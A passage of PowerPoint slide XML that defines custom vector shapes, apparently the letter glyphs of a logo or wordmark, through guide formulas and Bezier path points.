                    <a:cubicBezTo>
                      <a:pt x="9" y="7"/>
                      <a:pt x="9" y="7"/>
                      <a:pt x="9" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="5"/>
                      <a:pt x="8" y="4"/>
                      <a:pt x="7" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="4"/>
                      <a:pt x="4" y="4"/>
                      <a:pt x="4" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="21"/>
                      <a:pt x="4" y="21"/>
                      <a:pt x="4" y="21"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="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01"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5848350" y="808038"/>
                <a:ext cx="36513" cy="90488"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 18 w 18"/>
                  <a:gd name="T1" fmla="*/ 44 h 44"/>
                  <a:gd name="T2" fmla="*/ 13 w 18"/>
                  <a:gd name="T3" fmla="*/ 44 h 44"/>
                  <a:gd name="T4" fmla="*/ 9 w 18"/>
                  <a:gd name="T5" fmla="*/ 14 h 44"/>
                  <a:gd name="T6" fmla="*/ 5 w 18"/>
                  <a:gd name="T7" fmla="*/ 44 h 44"/>
                  <a:gd name="T8" fmla="*/ 0 w 18"/>
                  <a:gd name="T9" fmla="*/ 44 h 44"/>
                  <a:gd name="T10" fmla="*/ 6 w 18"/>
                  <a:gd name="T11" fmla="*/ 0 h 44"/>
                  <a:gd name="T12" fmla="*/ 9 w 18"/>
                  <a:gd name="T13" fmla="*/ 0 h 44"/>
                  <a:gd name="T14" fmla="*/ 11 w 18"/>
                  <a:gd name="T15" fmla="*/ 2 h 44"/>
                  <a:gd name="T16" fmla="*/ 18 w 18"/>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44">
                    <a:moveTo>
                      <a:pt x="18" y="44"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="44"/>
                      <a:pt x="13" y="44"/>
                      <a:pt x="13" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="14"/>
                      <a:pt x="9" y="14"/>
                      <a:pt x="9" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="44"/>
                      <a:pt x="5" y="44"/>
                      <a:pt x="5" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="44"/>
                      <a:pt x="0" y="44"/>
                      <a:pt x="0" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="0"/>
                      <a:pt x="6" y="0"/>
                      <a:pt x="6" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="0"/>
                      <a:pt x="9" y="0"/>
                      <a:pt x="9" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="0"/>
                      <a:pt x="11" y="1"/>
                      <a:pt x="11" y="2"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="18"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02"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5913438" y="808038"/>
                <a:ext cx="28575" cy="90488"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 14 w 14"/>
                  <a:gd name="T1" fmla="*/ 40 h 44"/>
                  <a:gd name="T2" fmla="*/ 13 w 14"/>
                  <a:gd name="T3" fmla="*/ 43 h 44"/>
                  <a:gd name="T4" fmla="*/ 11 w 14"/>
                  <a:gd name="T5" fmla="*/ 44 h 44"/>
                  <a:gd name="T6" fmla="*/ 0 w 14"/>
                  <a:gd name="T7" fmla="*/ 44 h 44"/>
                  <a:gd name="T8" fmla="*/ 0 w 14"/>
                  <a:gd name="T9" fmla="*/ 0 h 44"/>
                  <a:gd name="T10" fmla="*/ 3 w 14"/>
                  <a:gd name="T11" fmla="*/ 0 h 44"/>
                  <a:gd name="T12" fmla="*/ 4 w 14"/>
                  <a:gd name="T13" fmla="*/ 1 h 44"/>
                  <a:gd name="T14" fmla="*/ 4 w 14"/>
                  <a:gd name="T15" fmla="*/ 40 h 44"/>
                  <a:gd name="T16" fmla="*/ 14 w 14"/>
                  <a:gd name="T17"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4">
                    <a:moveTo>
                      <a:pt x="14" y="40"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="41"/>
                      <a:pt x="13" y="42"/>
                      <a:pt x="13" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="43"/>
                      <a:pt x="12" y="44"/>
                      <a:pt x="11" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="44"/>
                      <a:pt x="0" y="44"/>
                      <a:pt x="0" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="0"/>
                      <a:pt x="3" y="0"/>
                      <a:pt x="3" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="0"/>
                      <a:pt x="4" y="1"/>
                      <a:pt x="4" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="40"/>
                      <a:pt x="4" y="40"/>
                      <a:pt x="4" y="40"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="14"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03"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6019800" y="808038"/>
                <a:ext cx="36513" cy="90488"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 18 w 18"/>
                  <a:gd name="T1" fmla="*/ 44 h 44"/>
                  <a:gd name="T2" fmla="*/ 13 w 18"/>
                  <a:gd name="T3" fmla="*/ 44 h 44"/>
                  <a:gd name="T4" fmla="*/ 9 w 18"/>
                  <a:gd name="T5" fmla="*/ 14 h 44"/>
                  <a:gd name="T6" fmla="*/ 5 w 18"/>
                  <a:gd name="T7" fmla="*/ 44 h 44"/>
                  <a:gd name="T8" fmla="*/ 0 w 18"/>
                  <a:gd name="T9" fmla="*/ 44 h 44"/>
                  <a:gd name="T10" fmla="*/ 7 w 18"/>
                  <a:gd name="T11" fmla="*/ 0 h 44"/>
                  <a:gd name="T12" fmla="*/ 9 w 18"/>
                  <a:gd name="T13" fmla="*/ 0 h 44"/>
                  <a:gd name="T14" fmla="*/ 12 w 18"/>
                  <a:gd name="T15" fmla="*/ 2 h 44"/>
                  <a:gd name="T16" fmla="*/ 18 w 18"/>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44">
                    <a:moveTo>
                      <a:pt x="18" y="44"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="44"/>
                      <a:pt x="13" y="44"/>
                      <a:pt x="13" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="14"/>
                      <a:pt x="9" y="14"/>
                      <a:pt x="9" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="44"/>
                      <a:pt x="5" y="44"/>
                      <a:pt x="5" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="44"/>
                      <a:pt x="0" y="44"/>
                      <a:pt x="0" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="0"/>
                      <a:pt x="7" y="0"/>
                      <a:pt x="7" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="0"/>
                      <a:pt x="9" y="0"/>
                      <a:pt x="9" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="0"/>
                      <a:pt x="12" y="1"/>
                      <a:pt x="12" y="2"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="18"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4"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6083300" y="808038"/>
                <a:ext cx="28575" cy="90488"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 14 w 14"/>
                  <a:gd name="T1" fmla="*/ 44 h 44"/>
                  <a:gd name="T2" fmla="*/ 12 w 14"/>
                  <a:gd name="T3" fmla="*/ 44 h 44"/>
                  <a:gd name="T4" fmla="*/ 9 w 14"/>
                  <a:gd name="T5" fmla="*/ 41 h 44"/>
                  <a:gd name="T6" fmla="*/ 4 w 14"/>
                  <a:gd name="T7" fmla="*/ 19 h 44"/>
                  <a:gd name="T8" fmla="*/ 4 w 14"/>
                  <a:gd name="T9" fmla="*/ 44 h 44"/>
                  <a:gd name="T10" fmla="*/ 0 w 14"/>
                  <a:gd name="T11" fmla="*/ 44 h 44"/>
                  <a:gd name="T12" fmla="*/ 0 w 14"/>
                  <a:gd name="T13" fmla="*/ 0 h 44"/>
                  <a:gd name="T14" fmla="*/ 2 w 14"/>
                  <a:gd name="T15" fmla="*/ 0 h 44"/>
                  <a:gd name="T16" fmla="*/ 5 w 14"/>
                  <a:gd name="T17" fmla="*/ 3 h 44"/>
                  <a:gd name="T18" fmla="*/ 10 w 14"/>
                  <a:gd name="T19" fmla="*/ 25 h 44"/>
                  <a:gd name="T20" fmla="*/ 10 w 14"/>
                  <a:gd name="T21" fmla="*/ 0 h 44"/>
                  <a:gd name="T22" fmla="*/ 14 w 14"/>
                  <a:gd name="T23" fmla="*/ 0 h 44"/>
                  <a:gd name="T24" fmla="*/ 14 w 14"/>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44">
                    <a:moveTo>
                      <a:pt x="14" y="44"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="44"/>
                      <a:pt x="12" y="44"/>
                      <a:pt x="12" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="44"/>
                      <a:pt x="9" y="42"/>
                      <a:pt x="9" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="19"/>
                      <a:pt x="4" y="19"/>
                      <a:pt x="4" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="44"/>
                      <a:pt x="4" y="44"/>
                      <a:pt x="4" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="44"/>
                      <a:pt x="0" y="44"/>
                      <a:pt x="0" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="0"/>
                      <a:pt x="2" y="0"/>
                      <a:pt x="2" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="0"/>
                      <a:pt x="5" y="1"/>
                      <a:pt x="5" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="25"/>
                      <a:pt x="10" y="25"/>
                      <a:pt x="10" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="0"/>
                      <a:pt x="10" y="0"/>
                      <a:pt x="10" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="0"/>
                      <a:pt x="14" y="0"/>
                      <a:pt x="14" y="0"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="14"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05"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6138863" y="808038"/>
                <a:ext cx="36513" cy="90488"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 18 w 18"/>
                  <a:gd name="T1" fmla="*/ 44 h 44"/>
                  <a:gd name="T2" fmla="*/ 13 w 18"/>
                  <a:gd name="T3" fmla="*/ 44 h 44"/>
                  <a:gd name="T4" fmla="*/ 9 w 18"/>
                  <a:gd name="T5" fmla="*/ 14 h 44"/>
                  <a:gd name="T6" fmla="*/ 5 w 18"/>
                  <a:gd name="T7" fmla="*/ 44 h 44"/>
                  <a:gd name="T8" fmla="*/ 0 w 18"/>
                  <a:gd name="T9" fmla="*/ 44 h 44"/>
                  <a:gd name="T10" fmla="*/ 7 w 18"/>
                  <a:gd name="T11" fmla="*/ 0 h 44"/>
                  <a:gd name="T12" fmla="*/ 9 w 18"/>
                  <a:gd name="T13" fmla="*/ 0 h 44"/>
                  <a:gd name="T14" fmla="*/ 12 w 18"/>
                  <a:gd name="T15" fmla="*/ 2 h 44"/>
                  <a:gd name="T16" fmla="*/ 18 w 18"/>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44">
                    <a:moveTo>
                      <a:pt x="18" y="44"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="44"/>
                      <a:pt x="13" y="44"/>
                      <a:pt x="13" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="14"/>
                      <a:pt x="9" y="14"/>
                      <a:pt x="9" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="44"/>
                      <a:pt x="5" y="44"/>
                      <a:pt x="5" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="44"/>
                      <a:pt x="0" y="44"/>
                      <a:pt x="0" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="0"/>
                      <a:pt x="7" y="0"/>
                      <a:pt x="7" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="0"/>
                      <a:pt x="9" y="0"/>
                      <a:pt x="9" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="0"/>
                      <a:pt x="11" y="1"/>
                      <a:pt x="12" y="2"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="18"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6"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6203950" y="808038"/>
                <a:ext cx="31750" cy="90488"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 15 w 15"/>
                  <a:gd name="T1" fmla="*/ 40 h 44"/>
                  <a:gd name="T2" fmla="*/ 13 w 15"/>
                  <a:gd name="T3" fmla="*/ 43 h 44"/>
                  <a:gd name="T4" fmla="*/ 11 w 15"/>
                  <a:gd name="T5" fmla="*/ 44 h 44"/>
                  <a:gd name="T6" fmla="*/ 0 w 15"/>
                  <a:gd name="T7" fmla="*/ 44 h 44"/>
                  <a:gd name="T8" fmla="*/ 0 w 15"/>
                  <a:gd name="T9" fmla="*/ 0 h 44"/>
                  <a:gd name="T10" fmla="*/ 3 w 15"/>
                  <a:gd name="T11" fmla="*/ 0 h 44"/>
                  <a:gd name="T12" fmla="*/ 5 w 15"/>
                  <a:gd name="T13" fmla="*/ 1 h 44"/>
                  <a:gd name="T14" fmla="*/ 5 w 15"/>
                  <a:gd name="T15" fmla="*/ 40 h 44"/>
                  <a:gd name="T16" fmla="*/ 15 w 15"/>
                  <a:gd name="T17"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4">
                    <a:moveTo>
                      <a:pt x="15" y="40"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="41"/>
                      <a:pt x="13" y="42"/>
                      <a:pt x="13" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="43"/>
                      <a:pt x="12" y="44"/>
                      <a:pt x="11" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="44"/>
                      <a:pt x="0" y="44"/>
                      <a:pt x="0" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="0"/>
                      <a:pt x="3" y="0"/>
                      <a:pt x="3" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="0"/>
                      <a:pt x="5" y="1"/>
                      <a:pt x="5" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="40"/>
                      <a:pt x="5" y="40"/>
                      <a:pt x="5" y="40"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="1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p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6251575" y="808038"/>
                <a:ext cx="33338" cy="90488"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10 w 16"/>
                  <a:gd name="T1" fmla="*/ 26 h 44"/>
                  <a:gd name="T2" fmla="*/ 10 w 16"/>
                  <a:gd name="T3" fmla="*/ 44 h 44"/>
                  <a:gd name="T4" fmla="*/ 7 w 16"/>
                  <a:gd name="T5" fmla="*/ 44 h 44"/>
                  <a:gd name="T6" fmla="*/ 6 w 16"/>
                  <a:gd name="T7" fmla="*/ 43 h 44"/>
                  <a:gd name="T8" fmla="*/ 6 w 16"/>
                  <a:gd name="T9" fmla="*/ 26 h 44"/>
                  <a:gd name="T10" fmla="*/ 0 w 16"/>
                  <a:gd name="T11" fmla="*/ 0 h 44"/>
                  <a:gd name="T12" fmla="*/ 4 w 16"/>
                  <a:gd name="T13" fmla="*/ 0 h 44"/>
                  <a:gd name="T14" fmla="*/ 5 w 16"/>
                  <a:gd name="T15" fmla="*/ 2 h 44"/>
                  <a:gd name="T16" fmla="*/ 8 w 16"/>
                  <a:gd name="T17" fmla="*/ 18 h 44"/>
                  <a:gd name="T18" fmla="*/ 11 w 16"/>
                  <a:gd name="T19" fmla="*/ 2 h 44"/>
                  <a:gd name="T20" fmla="*/ 12 w 16"/>
                  <a:gd name="T21" fmla="*/ 0 h 44"/>
                  <a:gd name="T22" fmla="*/ 16 w 16"/>
                  <a:gd name="T23" fmla="*/ 0 h 44"/>
                  <a:gd name="T24" fmla="*/ 10 w 16"/>
                  <a:gd name="T25" fmla="*/ 2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44">
                    <a:moveTo>
                      <a:pt x="10" y="26"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="44"/>
                      <a:pt x="10" y="44"/>
                      <a:pt x="10" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="44"/>
                      <a:pt x="7" y="44"/>
                      <a:pt x="7" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="44"/>
                      <a:pt x="6" y="43"/>
                      <a:pt x="6" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="26"/>
                      <a:pt x="6" y="26"/>
                      <a:pt x="6" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="0"/>
                      <a:pt x="4" y="0"/>
                      <a:pt x="4" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="0"/>
                      <a:pt x="5" y="0"/>
                      <a:pt x="5" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="18"/>
                      <a:pt x="8" y="18"/>
                      <a:pt x="8" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="2"/>
                      <a:pt x="11" y="2"/>
                      <a:pt x="11" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="0"/>
                      <a:pt x="12" y="0"/>
                      <a:pt x="12" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="0"/>
                      <a:pt x="16" y="0"/>
                      <a:pt x="16" y="0"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="1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08"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6305550" y="808038"/>
                <a:ext cx="38100" cy="90488"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 18 w 19"/>
                  <a:gd name="T1" fmla="*/ 3 h 44"/>
                  <a:gd name="T2" fmla="*/ 15 w 19"/>
                  <a:gd name="T3" fmla="*/ 5 h 44"/>
                  <a:gd name="T4" fmla="*/ 12 w 19"/>
                  <a:gd name="T5" fmla="*/ 5 h 44"/>
                  <a:gd name="T6" fmla="*/ 11 w 19"/>
                  <a:gd name="T7" fmla="*/ 6 h 44"/>
                  <a:gd name="T8" fmla="*/ 11 w 19"/>
                  <a:gd name="T9" fmla="*/ 44 h 44"/>
                  <a:gd name="T10" fmla="*/ 8 w 19"/>
                  <a:gd name="T11" fmla="*/ 44 h 44"/>
                  <a:gd name="T12" fmla="*/ 6 w 19"/>
                  <a:gd name="T13" fmla="*/ 43 h 44"/>
                  <a:gd name="T14" fmla="*/ 6 w 19"/>
                  <a:gd name="T15" fmla="*/ 5 h 44"/>
                  <a:gd name="T16" fmla="*/ 0 w 19"/>
                  <a:gd name="T17" fmla="*/ 5 h 44"/>
                  <a:gd name="T18" fmla="*/ 0 w 19"/>
                  <a:gd name="T19" fmla="*/ 1 h 44"/>
                  <a:gd name="T20" fmla="*/ 1 w 19"/>
                  <a:gd name="T21" fmla="*/ 0 h 44"/>
                  <a:gd name="T22" fmla="*/ 19 w 19"/>
                  <a:gd name="T23" fmla="*/ 0 h 44"/>
                  <a:gd name="T24" fmla="*/ 18 w 19"/>
                  <a:gd name="T25"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44">
                    <a:moveTo>
                      <a:pt x="18" y="3"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="4"/>
                      <a:pt x="17" y="5"/>
                      <a:pt x="15" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="5"/>
                      <a:pt x="12" y="5"/>
                      <a:pt x="12" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="5"/>
                      <a:pt x="11" y="5"/>
                      <a:pt x="11" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="44"/>
                      <a:pt x="11" y="44"/>
                      <a:pt x="11" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="44"/>
                      <a:pt x="8" y="44"/>
                      <a:pt x="8" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="44"/>
                      <a:pt x="6" y="43"/>
                      <a:pt x="6" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="5"/>
                      <a:pt x="6" y="5"/>
                      <a:pt x="6" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="5"/>
                      <a:pt x="0" y="5"/>
                      <a:pt x="0" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="1"/>
                      <a:pt x="0" y="1"/>
                      <a:pt x="0" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="1"/>
                      <a:pt x="1" y="0"/>
                      <a:pt x="1" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="0"/>
                      <a:pt x="19" y="0"/>
                      <a:pt x="19" y="0"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="1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userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6370638" y="808038"/>
                <a:ext cx="9525" cy="90488"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 3 w 5"/>
                  <a:gd name="T1" fmla="*/ 0 h 44"/>
                  <a:gd name="T2" fmla="*/ 5 w 5"/>
                  <a:gd name="T3" fmla="*/ 2 h 44"/>
                  <a:gd name="T4" fmla="*/ 5 w 5"/>
                  <a:gd name="T5" fmla="*/ 44 h 44"/>
                  <a:gd name="T6" fmla="*/ 1 w 5"/>
                  <a:gd name="T7" fmla="*/ 44 h 44"/>
                  <a:gd name="T8" fmla="*/ 0 w 5"/>
                  <a:gd name="T9" fmla="*/ 43 h 44"/>
                  <a:gd name="T10" fmla="*/ 0 w 5"/>
                  <a:gd name="T11" fmla="*/ 0 h 44"/>
                  <a:gd name="T12" fmla="*/ 3 w 5"/>
                  <a:gd name="T13" fmla="*/ 0 h 44"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T8" y="T9"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T10" y="T11"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T12" y="T13"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="5" h="44">
                    <a:moveTo>
                      <a:pt x="3" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="0"/>
                      <a:pt x="5" y="1"/>
                      <a:pt x="5" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="44"/>
                      <a:pt x="5" y="44"/>
                      <a:pt x="5" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="44"/>
                      <a:pt x="1" y="44"/>
                      <a:pt x="1" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="44"/>
                      <a:pt x="0" y="43"/>
                      <a:pt x="0" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>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10"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6418263" y="808038"/>
                <a:ext cx="25400" cy="90488"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 13 w 13"/>
                  <a:gd name="T1" fmla="*/ 39 h 44"/>
                  <a:gd name="T2" fmla="*/ 8 w 13"/>
                  <a:gd name="T3" fmla="*/ 44 h 44"/>
                  <a:gd name="T4" fmla="*/ 5 w 13"/>
                  <a:gd name="T5" fmla="*/ 44 h 44"/>
                  <a:gd name="T6" fmla="*/ 0 w 13"/>
                  <a:gd name="T7" fmla="*/ 39 h 44"/>
                  <a:gd name="T8" fmla="*/ 0 w 13"/>
                  <a:gd name="T9" fmla="*/ 5 h 44"/>
                  <a:gd name="T10" fmla="*/ 5 w 13"/>
                  <a:gd name="T11" fmla="*/ 0 h 44"/>
                  <a:gd name="T12" fmla="*/ 8 w 13"/>
                  <a:gd name="T13" fmla="*/ 0 h 44"/>
                  <a:gd name="T14" fmla="*/ 13 w 13"/>
                  <a:gd name="T15" fmla="*/ 5 h 44"/>
                  <a:gd name="T16" fmla="*/ 13 w 13"/>
                  <a:gd name="T17" fmla="*/ 12 h 44"/>
                  <a:gd name="T18" fmla="*/ 12 w 13"/>
                  <a:gd name="T19" fmla="*/ 14 h 44"/>
                  <a:gd name="T20" fmla="*/ 9 w 13"/>
                  <a:gd name="T21" fmla="*/ 16 h 44"/>
                  <a:gd name="T22" fmla="*/ 9 w 13"/>
                  <a:gd name="T23" fmla="*/ 6 h 44"/>
                  <a:gd name="T24" fmla="*/ 6 w 13"/>
                  <a:gd name="T25" fmla="*/ 4 h 44"/>
                  <a:gd name="T26" fmla="*/ 4 w 13"/>
                  <a:gd name="T27" fmla="*/ 6 h 44"/>
                  <a:gd name="T28" fmla="*/ 4 w 13"/>
                  <a:gd name="T29" fmla="*/ 38 h 44"/>
